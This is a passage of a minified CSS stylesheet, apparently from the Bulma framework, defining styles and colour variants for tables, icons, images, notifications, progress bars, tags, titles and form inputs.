th{border-width:0 0 2px;color:#363636}.content table tfoot td,.content table tfoot th{border-width:2px 0 0;color:#363636}.content table tbody tr:last-child td,.content table tbody tr:last-child th{border-bottom-width:0}.content .tabs li+li{margin-top:0}.content.is-small{font-size:.75rem}.content.is-normal{font-size:1rem}.content.is-medium{font-size:1.25rem}.content.is-large{font-size:1.5rem}.icon{align-items:center;display:inline-flex;justify-content:center;height:1.5rem;width:1.5rem}.icon.is-small{height:1rem;width:1rem}.icon.is-medium{height:2rem;width:2rem}.icon.is-large{height:3rem;width:3rem}.icon-text{align-items:flex-start;color:inherit;display:inline-flex;flex-wrap:wrap;line-height:1.5rem;vertical-align:top}.icon-text .icon{flex-grow:0;flex-shrink:0}.icon-text .icon:not(:last-child){margin-right:.25em}.icon-text .icon:not(:first-child){margin-left:.25em}div.icon-text{display:flex}.image{display:block;position:relative}.image img{display:block;height:auto;width:100%}.image img.is-rounded{border-radius:9999px}.image.is-fullwidth{width:100%}.image.is-square img,.image.is-square .has-ratio,.image.is-1by1 img,.image.is-1by1 .has-ratio,.image.is-5by4 img,.image.is-5by4 .has-ratio,.image.is-4by3 img,.image.is-4by3 .has-ratio,.image.is-3by2 img,.image.is-3by2 .has-ratio,.image.is-5by3 img,.image.is-5by3 .has-ratio,.image.is-16by9 img,.image.is-16by9 .has-ratio,.image.is-2by1 img,.image.is-2by1 .has-ratio,.image.is-3by1 img,.image.is-3by1 .has-ratio,.image.is-4by5 img,.image.is-4by5 .has-ratio,.image.is-3by4 img,.image.is-3by4 .has-ratio,.image.is-2by3 img,.image.is-2by3 .has-ratio,.image.is-3by5 img,.image.is-3by5 .has-ratio,.image.is-9by16 img,.image.is-9by16 .has-ratio,.image.is-1by2 img,.image.is-1by2 .has-ratio,.image.is-1by3 img,.image.is-1by3 .has-ratio{height:100%;width:100%}.image.is-square,.image.is-1by1{padding-top:100%}.image.is-5by4{padding-top:80%}.image.is-4by3{padding-top:75%}.image.is-3by2{padding-top:66.6666%}.image.is-5by3{padding-top:60%}.image.is-16by9{padding-top:56.25%}.image.is-2by1{padding-top:50%}.image.is-3by1{padding-top:33.3333%}.image.is-4by5{padding-top:125%}.image.is-3by4{padding-top:133.3333%}.image.is-2by3{padding-top:150%}.image.is-3by5{padding-top:166.6666%}.image.is-9by16{padding-top:177.7777%}.image.is-1by2{padding-top:200%}.image.is-1by3{padding-top:300%}.image.is-16x16{height:16px;width:16px}.image.is-24x24{height:24px;width:24px}.image.is-32x32{height:32px;width:32px}.image.is-48x48{height:48px;width:48px}.image.is-64x64{height:64px;width:64px}.image.is-96x96{height:96px;width:96px}.image.is-128x128{height:128px;width:128px}.notification{background-color:#f5f5f5;border-radius:4px;position:relative;padding:1.25rem 2.5rem 1.25rem 1.5rem}.notification a:not(.button):not(.dropdown-item){color:currentColor;text-decoration:underline}.notification strong{color:currentColor}.notification code,.notification pre{background:white}.notification pre code{background:transparent}.notification>.delete{right:.5rem;position:absolute;top:.5rem}.notification .title,.notification .subtitle,.notification .content{color:currentColor}.notification.is-white{background-color:#fff;color:#0a0a0a}.notification.is-black{background-color:#0a0a0a;color:#fff}.notification.is-light{background-color:#f5f5f5;color:#000000b3}.notification.is-dark{background-color:#363636;color:#fff}.notification.is-primary{background-color:#00d1b2;color:#fff}.notification.is-primary.is-light{background-color:#ebfffc;color:#00947e}.notification.is-link{background-color:#485fc7;color:#fff}.notification.is-link.is-light{background-color:#eff1fa;color:#3850b7}.notification.is-info{background-color:#3e8ed0;color:#fff}.notification.is-info.is-light{background-color:#eff5fb;color:#296fa8}.notification.is-success{background-color:#48c78e;color:#fff}.notification.is-success.is-light{background-color:#effaf5;color:#257953}.notification.is-warning{background-color:#ffe08a;color:#000000b3}.notification.is-warning.is-light{background-color:#fffaeb;color:#946c00}.notification.is-danger{background-color:#f14668;color:#fff}.notification.is-danger.is-light{background-color:#feecf0;color:#cc0f35}.progress{-moz-appearance:none;-webkit-appearance:none;border:none;border-radius:9999px;display:block;height:1rem;overflow:hidden;padding:0;width:100%}.progress::-webkit-progress-bar{background-color:#ededed}.progress::-webkit-progress-value{background-color:#4a4a4a}.progress::-moz-progress-bar{background-color:#4a4a4a}.progress::-ms-fill{background-color:#4a4a4a;border:none}.progress.is-white::-webkit-progress-value{background-color:#fff}.progress.is-white::-moz-progress-bar{background-color:#fff}.progress.is-white::-ms-fill{background-color:#fff}.progress.is-white:indeterminate{background-image:linear-gradient(to right,white 30%,#ededed 30%)}.progress.is-black::-webkit-progress-value{background-color:#0a0a0a}.progress.is-black::-moz-progress-bar{background-color:#0a0a0a}.progress.is-black::-ms-fill{background-color:#0a0a0a}.progress.is-black:indeterminate{background-image:linear-gradient(to right,#0a0a0a 30%,#ededed 30%)}.progress.is-light::-webkit-progress-value{background-color:#f5f5f5}.progress.is-light::-moz-progress-bar{background-color:#f5f5f5}.progress.is-light::-ms-fill{background-color:#f5f5f5}.progress.is-light:indeterminate{background-image:linear-gradient(to right,whitesmoke 30%,#ededed 30%)}.progress.is-dark::-webkit-progress-value{background-color:#363636}.progress.is-dark::-moz-progress-bar{background-color:#363636}.progress.is-dark::-ms-fill{background-color:#363636}.progress.is-dark:indeterminate{background-image:linear-gradient(to right,#363636 30%,#ededed 30%)}.progress.is-primary::-webkit-progress-value{background-color:#00d1b2}.progress.is-primary::-moz-progress-bar{background-color:#00d1b2}.progress.is-primary::-ms-fill{background-color:#00d1b2}.progress.is-primary:indeterminate{background-image:linear-gradient(to right,#00d1b2 30%,#ededed 30%)}.progress.is-link::-webkit-progress-value{background-color:#485fc7}.progress.is-link::-moz-progress-bar{background-color:#485fc7}.progress.is-link::-ms-fill{background-color:#485fc7}.progress.is-link:indeterminate{background-image:linear-gradient(to right,#485fc7 30%,#ededed 30%)}.progress.is-info::-webkit-progress-value{background-color:#3e8ed0}.progress.is-info::-moz-progress-bar{background-color:#3e8ed0}.progress.is-info::-ms-fill{background-color:#3e8ed0}.progress.is-info:indeterminate{background-image:linear-gradient(to right,#3e8ed0 30%,#ededed 30%)}.progress.is-success::-webkit-progress-value{background-color:#48c78e}.progress.is-success::-moz-progress-bar{background-color:#48c78e}.progress.is-success::-ms-fill{background-color:#48c78e}.progress.is-success:indeterminate{background-image:linear-gradient(to right,#48c78e 30%,#ededed 30%)}.progress.is-warning::-webkit-progress-value{background-color:#ffe08a}.progress.is-warning::-moz-progress-bar{background-color:#ffe08a}.progress.is-warning::-ms-fill{background-color:#ffe08a}.progress.is-warning:indeterminate{background-image:linear-gradient(to right,#ffe08a 30%,#ededed 30%)}.progress.is-danger::-webkit-progress-value{background-color:#f14668}.progress.is-danger::-moz-progress-bar{background-color:#f14668}.progress.is-danger::-ms-fill{background-color:#f14668}.progress.is-danger:indeterminate{background-image:linear-gradient(to right,#f14668 30%,#ededed 30%)}.progress:indeterminate{-webkit-animation-duration:1.5s;animation-duration:1.5s;-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite;-webkit-animation-name:moveIndeterminate;animation-name:moveIndeterminate;-webkit-animation-timing-function:linear;animation-timing-function:linear;background-color:#ededed;background-image:linear-gradient(to right,#4a4a4a 30%,#ededed 30%);background-position:top left;background-repeat:no-repeat;background-size:150% 150%}.progress:indeterminate::-webkit-progress-bar{background-color:transparent}.progress:indeterminate::-moz-progress-bar{background-color:transparent}.progress:indeterminate::-ms-fill{animation-name:none}.progress.is-small{height:.75rem}.progress.is-medium{height:1.25rem}.progress.is-large{height:1.5rem}@-webkit-keyframes moveIndeterminate{0%{background-position:200% 0}to{background-position:-200% 0}}@keyframes moveIndeterminate{0%{background-position:200% 0}to{background-position:-200% 0}}.table{background-color:#fff;color:#363636}.table td,.table th{border:1px solid #dbdbdb;border-width:0 0 1px;padding:.5em .75em;vertical-align:top}.table td.is-white,.table th.is-white{background-color:#fff;border-color:#fff;color:#0a0a0a}.table td.is-black,.table th.is-black{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.table td.is-light,.table th.is-light{background-color:#f5f5f5;border-color:#f5f5f5;color:#000000b3}.table td.is-dark,.table th.is-dark{background-color:#363636;border-color:#363636;color:#fff}.table td.is-primary,.table th.is-primary{background-color:#00d1b2;border-color:#00d1b2;color:#fff}.table td.is-link,.table th.is-link{background-color:#485fc7;border-color:#485fc7;color:#fff}.table td.is-info,.table th.is-info{background-color:#3e8ed0;border-color:#3e8ed0;color:#fff}.table td.is-success,.table th.is-success{background-color:#48c78e;border-color:#48c78e;color:#fff}.table td.is-warning,.table th.is-warning{background-color:#ffe08a;border-color:#ffe08a;color:#000000b3}.table td.is-danger,.table th.is-danger{background-color:#f14668;border-color:#f14668;color:#fff}.table td.is-narrow,.table th.is-narrow{white-space:nowrap;width:1%}.table td.is-selected,.table th.is-selected{background-color:#00d1b2;color:#fff}.table td.is-selected a,.table td.is-selected strong,.table th.is-selected a,.table th.is-selected strong{color:currentColor}.table td.is-vcentered,.table th.is-vcentered{vertical-align:middle}.table th{color:#363636}.table th:not([align]){text-align:left}.table tr.is-selected{background-color:#00d1b2;color:#fff}.table tr.is-selected a,.table tr.is-selected strong{color:currentColor}.table tr.is-selected td,.table tr.is-selected th{border-color:#fff;color:currentColor}.table thead{background-color:transparent}.table thead td,.table thead th{border-width:0 0 2px;color:#363636}.table tfoot{background-color:transparent}.table tfoot td,.table tfoot th{border-width:2px 0 0;color:#363636}.table tbody{background-color:transparent}.table tbody tr:last-child td,.table tbody tr:last-child th{border-bottom-width:0}.table.is-bordered td,.table.is-bordered th{border-width:1px}.table.is-bordered tr:last-child td,.table.is-bordered tr:last-child th{border-bottom-width:1px}.table.is-fullwidth{width:100%}.table.is-hoverable tbody tr:not(.is-selected):hover{background-color:#fafafa}.table.is-hoverable.is-striped tbody tr:not(.is-selected):hover{background-color:#fafafa}.table.is-hoverable.is-striped tbody tr:not(.is-selected):hover:nth-child(2n){background-color:#f5f5f5}.table.is-narrow td,.table.is-narrow th{padding:.25em .5em}.table.is-striped tbody tr:not(.is-selected):nth-child(2n){background-color:#fafafa}.table-container{-webkit-overflow-scrolling:touch;overflow:auto;overflow-y:hidden;max-width:100%}.tags{align-items:center;display:flex;flex-wrap:wrap;justify-content:flex-start}.tags .tag{margin-bottom:.5rem}.tags .tag:not(:last-child){margin-right:.5rem}.tags:last-child{margin-bottom:-.5rem}.tags:not(:last-child){margin-bottom:1rem}.tags.are-medium .tag:not(.is-normal):not(.is-large){font-size:1rem}.tags.are-large .tag:not(.is-normal):not(.is-medium){font-size:1.25rem}.tags.is-centered{justify-content:center}.tags.is-centered .tag{margin-right:.25rem;margin-left:.25rem}.tags.is-right{justify-content:flex-end}.tags.is-right .tag:not(:first-child){margin-left:.5rem}.tags.is-right .tag:not(:last-child){margin-right:0}.tags.has-addons .tag{margin-right:0}.tags.has-addons .tag:not(:first-child){margin-left:0;border-top-left-radius:0;border-bottom-left-radius:0}.tags.has-addons .tag:not(:last-child){border-top-right-radius:0;border-bottom-right-radius:0}.tag:not(body){align-items:center;background-color:#f5f5f5;border-radius:4px;color:#4a4a4a;display:inline-flex;font-size:.75rem;height:2em;justify-content:center;line-height:1.5;padding-left:.75em;padding-right:.75em;white-space:nowrap}.tag:not(body) .delete{margin-left:.25rem;margin-right:-.375rem}.tag:not(body).is-white{background-color:#fff;color:#0a0a0a}.tag:not(body).is-black{background-color:#0a0a0a;color:#fff}.tag:not(body).is-light{background-color:#f5f5f5;color:#000000b3}.tag:not(body).is-dark{background-color:#363636;color:#fff}.tag:not(body).is-primary{background-color:#00d1b2;color:#fff}.tag:not(body).is-primary.is-light{background-color:#ebfffc;color:#00947e}.tag:not(body).is-link{background-color:#485fc7;color:#fff}.tag:not(body).is-link.is-light{background-color:#eff1fa;color:#3850b7}.tag:not(body).is-info{background-color:#3e8ed0;color:#fff}.tag:not(body).is-info.is-light{background-color:#eff5fb;color:#296fa8}.tag:not(body).is-success{background-color:#48c78e;color:#fff}.tag:not(body).is-success.is-light{background-color:#effaf5;color:#257953}.tag:not(body).is-warning{background-color:#ffe08a;color:#000000b3}.tag:not(body).is-warning.is-light{background-color:#fffaeb;color:#946c00}.tag:not(body).is-danger{background-color:#f14668;color:#fff}.tag:not(body).is-danger.is-light{background-color:#feecf0;color:#cc0f35}.tag:not(body).is-normal{font-size:.75rem}.tag:not(body).is-medium{font-size:1rem}.tag:not(body).is-large{font-size:1.25rem}.tag:not(body) .icon:first-child:not(:last-child){margin-left:-.375em;margin-right:.1875em}.tag:not(body) .icon:last-child:not(:first-child){margin-left:.1875em;margin-right:-.375em}.tag:not(body) .icon:first-child:last-child{margin-left:-.375em;margin-right:-.375em}.tag:not(body).is-delete{margin-left:1px;padding:0;position:relative;width:2em}.tag:not(body).is-delete:before,.tag:not(body).is-delete:after{background-color:currentColor;content:"";display:block;left:50%;position:absolute;top:50%;transform:translate(-50%) translateY(-50%) rotate(45deg);transform-origin:center center}.tag:not(body).is-delete:before{height:1px;width:50%}.tag:not(body).is-delete:after{height:50%;width:1px}.tag:not(body).is-delete:hover,.tag:not(body).is-delete:focus{background-color:#e8e8e8}.tag:not(body).is-delete:active{background-color:#dbdbdb}.tag:not(body).is-rounded{border-radius:9999px}a.tag:hover{text-decoration:underline}.title,.subtitle{word-break:break-word}.title em,.title span,.subtitle em,.subtitle span{font-weight:inherit}.title sub,.subtitle sub,.title sup,.subtitle sup{font-size:.75em}.title .tag,.subtitle .tag{vertical-align:middle}.title{color:#363636;font-size:2rem;font-weight:600;line-height:1.125}.title strong{color:inherit;font-weight:inherit}.title:not(.is-spaced)+.subtitle{margin-top:-1.25rem}.title.is-1{font-size:3rem}.title.is-2{font-size:2.5rem}.title.is-3{font-size:2rem}.title.is-4{font-size:1.5rem}.title.is-5{font-size:1.25rem}.title.is-6{font-size:1rem}.title.is-7{font-size:.75rem}.subtitle{color:#4a4a4a;font-size:1.25rem;font-weight:400;line-height:1.25}.subtitle strong{color:#363636;font-weight:600}.subtitle:not(.is-spaced)+.title{margin-top:-1.25rem}.subtitle.is-1{font-size:3rem}.subtitle.is-2{font-size:2.5rem}.subtitle.is-3{font-size:2rem}.subtitle.is-4{font-size:1.5rem}.subtitle.is-5{font-size:1.25rem}.subtitle.is-6{font-size:1rem}.subtitle.is-7{font-size:.75rem}.heading{display:block;font-size:11px;letter-spacing:1px;margin-bottom:5px;text-transform:uppercase}.number{align-items:center;background-color:#f5f5f5;border-radius:9999px;display:inline-flex;font-size:1.25rem;height:2em;justify-content:center;margin-right:1.5rem;min-width:2.5em;padding:.25rem .5rem;text-align:center;vertical-align:top}.input,.textarea,.select select{background-color:#fff;border-color:#dbdbdb;border-radius:4px;color:#363636}.input::-moz-placeholder,.textarea::-moz-placeholder,.select select::-moz-placeholder{color:#3636364d}.input::-webkit-input-placeholder,.textarea::-webkit-input-placeholder,.select select::-webkit-input-placeholder{color:#3636364d}.input:-moz-placeholder,.textarea:-moz-placeholder,.select select:-moz-placeholder{color:#3636364d}.input:-ms-input-placeholder,.textarea:-ms-input-placeholder,.select select:-ms-input-placeholder{color:#3636364d}.input:hover,.textarea:hover,.select select:hover,.is-hovered.input,.is-hovered.textarea,.select select.is-hovered{border-color:#b5b5b5}.input:focus,.textarea:focus,.select select:focus,.is-focused.input,.is-focused.textarea,.select select.is-focused,.input:active,.textarea:active,.select select:active,.is-active.input,.is-active.textarea,.select select.is-active{border-color:#485fc7;box-shadow:0 0 0 .125em #485fc740}.input[disabled],.textarea[disabled],.select select[disabled],fieldset[disabled] .input,fieldset[disabled] .textarea,fieldset[disabled] .select select,.select fieldset[disabled] select{background-color:#f5f5f5;border-color:#f5f5f5;box-shadow:none;color:#7a7a7a}.input[disabled]::-moz-placeholder,.textarea[disabled]::-moz-placeholder,.select select[disabled]::-moz-placeholder,fieldset[disabled] .input::-moz-placeholder,fieldset[disabled] .textarea::-moz-placeholder,fieldset[disabled] .select select::-moz-placeholder,.select fieldset[disabled] select::-moz-placeholder{color:#7a7a7a4d}.input[disabled]::-webkit-input-placeholder,.textarea[disabled]::-webkit-input-placeholder,.select select[disabled]::-webkit-input-placeholder,fieldset[disabled] .input::-webkit-input-placeholder,fieldset[disabled] .textarea::-webkit-input-placeholder,fieldset[disabled] .select select::-webkit-input-placeholder,.select fieldset[disabled] select::-webkit-input-placeholder{color:#7a7a7a4d}.input[disabled]:-moz-placeholder,.textarea[disabled]:-moz-placeholder,.select select[disabled]:-moz-placeholder,fieldset[disabled] .input:-moz-placeholder,fieldset[disabled] .textarea:-moz-placeholder,fieldset[disabled] .select select:-moz-placeholder,.select fieldset[disabled] select:-moz-placeholder{color:#7a7a7a4d}.input[disabled]:-ms-input-placeholder,.textarea[disabled]:-ms-input-placeholder,.select select[disabled]:-ms-input-placeholder,fieldset[disabled] .input:-ms-input-placeholder,fieldset[disabled] .textarea:-ms-input-placeholder,fieldset[disabled] .select select:-ms-input-placeholder,.select fieldset[disabled] select:-ms-input-placeholder{color:#7a7a7a4d}.input,.textarea{box-shadow:inset 0 .0625em .125em #0a0a0a0d;max-width:100%;width:100%}.input[readonly],.textarea[readonly]{box-shadow:none}.is-white.input,.is-white.textarea{border-color:#fff}.is-white.input:focus,.is-white.textarea:focus,.is-white.is-focused.input,.is-white.is-focused.textarea,.is-white.input:active,.is-white.textarea:active,.is-white.is-active.input,.is-white.is-active.textarea{box-shadow:0 0 0 .125em #ffffff40}.is-black.input,.is-black.textarea{border-color:#0a0a0a}.is-black.input:focus,.is-black.textarea:focus,.is-black.is-focused.input,.is-black.is-focused.textarea,.is-black.input:active,.is-black.textarea:active,.is-black.is-active.input,.is-black.is-active.textarea{box-shadow:0 0 0 .125em #0a0a0a40}.is-light.input,.is-light.textarea{border-color:#f5f5f5}.is-light.input:focus,.is-light.textarea:focus,.is-light.is-focused.input,.is-light.is-focused.textarea,.is-light.input:active,.is-light.textarea:active,.is-light.is-active.input,.is-light.is-active.textarea{box-shadow:0 0 0 .125em #f5f5f540}.is-dark.input,.is-dark.textarea{border-color:#363636}.is-dark.input:focus,.is-dark.textarea:focus,.is-dark.is-focused.input,.is-dark.is-focused.textarea,.is-dark.input:active,.is-dark.textarea:active,.is-dark.is-active.input,.is-dark.is-active.textarea{box-shadow:0 0 0 .125em #36363640}.is-primary.input,.is-primary.textarea{border-color:#00d1b2}.is-primary.input:focus,.is-primary.textarea:focus,.is-primary.is-focused.input,.is-primary.is-focused.textarea,.is-primary.input:active,.is-primary.textarea:active,.is-primary.is-active.input,.is-primary.is-active.textarea{box-shadow:0 0 0 .125em #00d1b240}.is-link.input,.is-link.textarea{border-color:#485fc7}.is-link.input:focus,.is-link.textarea:focus,.is-link.is-focused.input,.is-link.is-focused.textarea,.is-link.input:active,.is-link.textarea:active,.is-link.is-active.input,.is-link.is-active.textarea{box-shadow:0 0 0 .125em #485fc740}.is-info.input,.is-info.textarea{border-color:#3e8ed0}.is-info.input:focus,.is-info.textarea:focus,.is-info.is-focused.input,.is-info.is-focused.textarea,.is-info.input:active,.is-info.textarea:active,.is-info.is-active.input,.is-info.is-active.textarea{box-shadow:0 0 0 .125em #3e8ed040}.is-success.input,.is-success.textarea{border-color:#48c78e}.is-success.input:focus,.is-success.textarea:focus,.is-success.is-focused.input,.is-success.is-focused.textarea,.is-success.input:active,.is-success.textarea:active,.is-success.is-active.input,.is-success.is-active.textarea{box-shadow:0 0 0 .125em #48c78e40}.is-warning.input,.is-warning.textarea{border-color:#ffe08a}.is-warning.input:focus,.is-warning.textarea:focus,.is-warning.is-focused.input,.is-warning.is-focused.textarea,.is-warning.input:active,.is-warning.textarea:active,.is-warning.is-active.input,.is-warning.is-active.textarea{box-shadow:0 0 0 .125em #ffe08a40}.is-danger.input,.is-danger.textarea{border-color:#f14668}.is-danger.input:focus,.is-danger.textarea:focus,.is-danger.is-focused.input,.is-danger.is-focused.textarea,.is-danger.input:active,.is-danger.textarea:active,.is-danger.is-active.input,.is-danger.is-active.textarea{box-shadow:0 0 0 .125em #f1466840}.is-small.input,.is-small.textarea{border-radius:2px;font-size:.75rem}.is-medium.input,.is-medium.textarea{font-size:1.25rem}.is-large.input,.is-large.textarea{font-size:1.5rem}.is-fullwidth.input,.is-fullwidth.textarea{display:block;width:100%}.is-inline.input,.is-inline.textarea{display:inline;width:auto}.input.is-rounded{border-radius:9999px;padding-left:calc(1.125em - 1px);padding-right:calc(1.125em - 1px)}.input.is-static{background-color:transparent;border-color:transparent;box-shadow:none;padding-left:0;padding-right:0}.textarea{display:block;max-width:100%;min-width:100%;padding:calc(.75em - 1px);resize:vertical}.textarea:not([rows]){max-height:40em;min-height:8em}.textarea[rows]{height:initial}.textarea.has-fixed-size{resize:none}.checkbox,.radio{cursor:pointer;display:inline-block;line-height:1.25;position:relative}.checkbox input,.radio input{cursor:pointer}.checkbox:hover,.radio:hover{color:#363636}.checkbox[disabled],.radio[disabled],fieldset[disabled] .checkbox,fieldset[disabled] .radio,.checkbox input[disabled],.radio input[disabled]{color:#7a7a7a;cursor:not-allowed}.radio+.radio{margin-left:.5em}.select{display:inline-block;max-width:100%;position:relative;vertical-align:top}.select:not(.is-multiple){height:2.5em}.select:not(.is-multiple):not(.is-loading):after{border-color:#485fc7;right:1.125em;z-index:4}.select.is-rounded select{border-radius:9999px;padding-left:1em}.select select{cursor:pointer;display:block;font-size:1em;max-width:100%;outline:none}.select select::-ms-expand{display:none}.select select[disabled]:hover,fieldset[disabled] .select select:hover{border-color:#f5f5f5}.select select:not([multiple]){padding-right:2.5em}.select select[multiple]{height:auto;padding:0}.select select[multiple] option{padding:.5em 1em}.select:not(.is-multiple):not(.is-loading):hover:after{border-color:#363636}.select.is-white:not(:hover):after{border-color:#fff}.select.is-white select{border-color:#fff}.select.is-white select:hover,.select.is-white select.is-hovered{border-color:#f2f2f2}.select.is-white select:focus,.select.is-white select.is-focused,.select.is-white select:active,.select.is-white select.is-active{box-shadow:0 0 0 .125em #ffffff40}.select.is-black:not(:hover):after{border-color:#0a0a0a}.select.is-black select{border-color:#0a0a0a}.select.is-black select:hover,.select.is-black select.is-hovered{border-color:#000}.select.is-black select:focus,.select.is-black select.is-focused,.select.is-black select:active,.select.is-black select.is-active{box-shadow:0 0 0 .125em #0a0a0a40}.select.is-light:not(:hover):after{border-color:#f5f5f5}.select.is-light select{border-color:#f5f5f5}.select.is-light select:hover,.select.is-light select.is-hovered{border-color:#e8e8e8}.select.is-light select:focus,.select.is-light select.is-focused,.select.is-light select:active,.select.is-light select.is-active{box-shadow:0 0 0 .125em #f5f5f540}.select.is-dark:not(:hover):after{border-color:#363636}.select.is-dark select{border-color:#363636}.select.is-dark select:hover,.select.is-dark select.is-hovered{border-color:#292929}.select.is-dark select:focus,.select.is-dark select.is-focused,.select.is-dark select:active,.select.is-dark select.is-active{box-shadow:0 0 0 .125em #36363640}.select.is-primary:not(:hover):after{border-color:#00d1b2}.select.is-primary select{border-color:#00d1b2}.select.is-primary select:hover,.select.is-primary select.is-hovered{border-color:#00b89c}.select.is-primary select:focus,.select.is-primary select.is-focused,.select.is-primary select:active,.select.is-primary select.is-active{box-shadow:0 0 0 .125em #00d1b240}.select.is-link:not(:hover):after{border-color:#485fc7}.select.is-link select{border-color:#485fc7}.select.is-link select:hover,.select.is-link select.is-hovered{border-color:#3a51bb}.select.is-link select:focus,.select.is-link select.is-focused,.select.is-link select:active,.select.is-link select.is-active{box-shadow:0 0 0 .125em #485fc740}.select.is-info:not(:hover):after{border-color:#3e8ed0}.select.is-info select{border-color:#3e8ed0}.select.is-info select:hover,.select.is-info select.is-hovered{border-color:#3082c5}.select.is-info select:focus,.select.is-info select.is-focused,.select.is-info select:active,.select.is-info select.is-active{box-shadow:0 0 0 .125em #3e8ed040}.select.is-success:not(:hover):after{border-color:#48c78e}.select.is-success select{border-color:#48c78e}.select.is-success select:hover,.select.is-success select.is-hovered{border-color:#3abb81}.select.is-success select:focus,.select.is-success select.is-focused,.select.is-success select:active,.select.is-success select.is-active{box-shadow:0 0 0 .125em #48c78e40}.select.is-warning:not(:hover):after{border-color:#ffe08a}.select.is-warning select{border-color:#ffe08a}.select.is-warning select:hover,.select.is-warning select.is-hovered{border-color:#ffd970}.select.is-warning select:focus,.select.is-warning select.is-focused,.select.is-warning select:active,.select.is-warning select.is-active{box-shadow:0 0 0 .125em #ffe08a40}.select.is-danger:not(:hover):after{border-color:#f14668}.select.is-danger select{border-color:#f14668}.select.is-danger select:hover,.select.is-danger select.is-hovered{border-color:#ef2e55}.select.is-danger select:focus,.select.is-danger select.is-focused,.select.is-danger select:active,.select.is-danger select.is-active{box-shadow:0 0 0 .125em #f1466840}.select.is-small{border-radius:2px;font-size:.75rem}.select.is-medium{font-size:1.25rem}.select.is-large{font-size:1.5rem}.select.is-disabled:after{border-color:#7a7a7a!important;opacity:.5}.select.is-fullwidth,.select.is-fullwidth select{width:100%}.select.is-loading:after{margin-top:0;position:absolute;right:.625em;top:.625em;transform:none}.select.is-loading.is-small:after{font-size:.75rem}.select.is-loading.is-medium:after{font-size:1.25rem}.select.is-loading.is-large:after{font-size:1.5rem}.file{align-items:stretch;display:flex;justify-content:flex-start;position:relative}.file.is-white .file-cta{background-color:#fff;border-color:transparent;color:#0a0a0a}.file.is-white:hover .file-cta,.file.is-white.is-hovered .file-cta{background-color:#f9f9f9;border-color:transparent;color:#0a0a0a}.file.is-white:focus .file-cta,.file.is-white.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #ffffff40;color:#0a0a0a}.file.is-white:active .file-cta,.file.is-white.is-active .file-cta{background-color:#f2f2f2;border-color:transparent;color:#0a0a0a}.file.is-black .file-cta{background-color:#0a0a0a;border-color:transparent;color:#fff}.file.is-black:hover .file-cta,.file.is-black.is-hovered .file-cta{background-color:#040404;border-color:transparent;color:#fff}.file.is-black:focus .file-cta,.file.is-black.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #0a0a0a40;color:#fff}.file.is-black:active .file-cta,.file.is-black.is-active .file-cta{background-color:#000;border-color:transparent;color:#fff}.file.is-light .file-cta{background-color:#f5f5f5;border-color:transparent;color:#000000b3}.file.is-light:hover .file-cta,.file.is-light.is-hovered .file-cta{background-color:#eee;border-color:transparent;color:#000000b3}.file.is-light:focus .file-cta,.file.is-light.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #f5f5f540;color:#000000b3}.file.is-light:active .file-cta,.file.is-light.is-active .file-cta{background-color:#e8e8e8;border-color:transparent;color:#000000b3}.file.is-dark .file-cta{background-color:#363636;border-color:transparent;color:#fff}.file.is-dark:hover .file-cta,.file.is-dark.is-hovered .file-cta{background-color:#2f2f2f;border-color:transparent;color:#fff}.file.is-dark:focus .file-cta,.file.is-dark.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #36363640;color:#fff}.file.is-dark:active .file-cta,.file.is-dark.is-active .file-cta{background-color:#292929;border-color:transparent;color:#fff}.file.is-primary .file-cta{background-color:#00d1b2;border-color:transparent;color:#fff}.file.is-primary:hover .file-cta,.file.is-primary.is-hovered .file-cta{background-color:#00c4a7;border-color:transparent;color:#fff}.file.is-primary:focus .file-cta,.file.is-primary.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #00d1b240;color:#fff}.file.is-primary:active .file-cta,.file.is-primary.is-active .file-cta{background-color:#00b89c;border-color:transparent;color:#fff}.file.is-link .file-cta{background-color:#485fc7;border-color:transparent;color:#fff}.file.is-link:hover .file-cta,.file.is-link.is-hovered .file-cta{background-color:#3e56c4;border-color:transparent;color:#fff}.file.is-link:focus .file-cta,.file.is-link.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #485fc740;color:#fff}.file.is-link:active .file-cta,.file.is-link.is-active .file-cta{background-color:#3a51bb;border-color:transparent;color:#fff}.file.is-info .file-cta{background-color:#3e8ed0;border-color:transparent;color:#fff}.file.is-info:hover .file-cta,.file.is-info.is-hovered .file-cta{background-color:#3488ce;border-color:transparent;color:#fff}.file.is-info:focus .file-cta,.file.is-info.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #3e8ed040;color:#fff}.file.is-info:active .file-cta,.file.is-info.is-active .file-cta{background-color:#3082c5;border-color:transparent;color:#fff}.file.is-success .file-cta{background-color:#48c78e;border-color:transparent;color:#fff}.file.is-success:hover .file-cta,.file.is-success.is-hovered .file-cta{background-color:#3ec487;border-color:transparent;color:#fff}.file.is-success:focus .file-cta,.file.is-success.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #48c78e40;color:#fff}.file.is-success:active .file-cta,.file.is-success.is-active .file-cta{background-color:#3abb81;border-color:transparent;color:#fff}.file.is-warning .file-cta{background-color:#ffe08a;border-color:transparent;color:#000000b3}.file.is-warning:hover .file-cta,.file.is-warning.is-hovered .file-cta{background-color:#ffdc7d;border-color:transparent;color:#000000b3}.file.is-warning:focus .file-cta,.file.is-warning.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #ffe08a40;color:#000000b3}.file.is-warning:active .file-cta,.file.is-warning.is-active .file-cta{background-color:#ffd970;border-color:transparent;color:#000000b3}.file.is-danger .file-cta{background-color:#f14668;border-color:transparent;color:#fff}.file.is-danger:hover .file-cta,.file.is-danger.is-hovered .file-cta{background-color:#f03a5f;border-color:transparent;color:#fff}.file.is-danger:focus .file-cta,.file.is-danger.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #f1466840;color:#fff}.file.is-danger:active .file-cta,.file.is-danger.is-active .file-cta{background-color:#ef2e55;border-color:transparent;color:#fff}.file.is-small{font-size:.75rem}.file.is-normal{font-size:1rem}.file.is-medium{font-size:1.25rem}.file.is-medium .file-icon .fa{font-size:21px}.file.is-large{font-size:1.5rem}.file.is-large .file-icon .fa{font-size:28px}.file.has-name .file-cta{border-bottom-right-radius:0;border-top-right-radius:0}.file.has-name 